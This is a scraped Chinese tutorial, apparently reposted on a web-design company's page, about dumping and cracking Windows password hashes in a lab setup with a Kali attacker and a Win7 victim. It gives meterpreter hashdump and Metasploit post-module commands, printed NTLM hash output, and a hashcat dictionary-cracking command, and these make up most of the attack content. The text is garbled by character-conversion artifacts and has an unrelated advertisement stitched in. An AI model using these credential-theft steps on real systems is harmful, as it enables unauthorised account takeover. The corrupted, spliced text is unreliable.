這期內(nèi)容當(dāng)中小編將會(huì)給大家?guī)?lái)有關(guān)如何破解內(nèi)網(wǎng)hash值，文章內(nèi)容豐富且以專(zhuān)業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

為城廂等地區(qū)用戶提供了全套網(wǎng)頁(yè)設(shè)計(jì)制作服務(wù)，及城廂網(wǎng)站建設(shè)行業(yè)解決方案。主營(yíng)業(yè)務(wù)為成都網(wǎng)站設(shè)計(jì)、成都做網(wǎng)站、城廂網(wǎng)站設(shè)計(jì)，以傳統(tǒng)方式定制建設(shè)網(wǎng)站，并提供域名空間備案等一條龍服務(wù)，秉承以專(zhuān)業(yè)、用心的態(tài)度為用戶提供真誠(chéng)的服務(wù)。我們深信只要達(dá)到每一位用戶的要求，就會(huì)得到認(rèn)可，從而選擇與我們長(zhǎng)期合作。這樣，我們也可以走得更遠(yuǎn)！

環(huán)境：小攻：Kali 2020，ip：192.168.1.133

          小受：win7 x86，ip：192.168.1.137

一、生成木馬及監(jiān)聽(tīng)主機(jī)參考上篇文章：

內(nèi)網(wǎng)滲透 -- 提升權(quán)限(利用提權(quán)漏洞)

二、獲取內(nèi)網(wǎng)的hash值

1、直接獲取：hashdump

meterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::aiyou:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

2、通過(guò)模塊獲?。簉un post/windows/gather/hashdump

三、破解內(nèi)網(wǎng)的hash值

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::aiyou:1002:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::

1、將最后一段密文復(fù)制到在線解密網(wǎng)站

2、利用hashcat離線破解

hashcat -a 0 -m 1000 1.txt 2.txt --force

-a 指定攻擊模式，有5種模式

0 Straight（字典破解）

1 Combination（組合破解）

3 Brute-force（掩碼暴力破解）

6 Hybrid dict + mask（混合字典+掩碼）

7 Hybrid mask + dict（混合掩碼+字典）

-m 指定hash類(lèi)型

1.txt內(nèi)容為獲取的hash值

2.txt內(nèi)容為解密的字典

上述就是小編為大家分享的如何破解內(nèi)網(wǎng)hash值了，如果剛好有類(lèi)似的疑惑，不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識(shí)，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。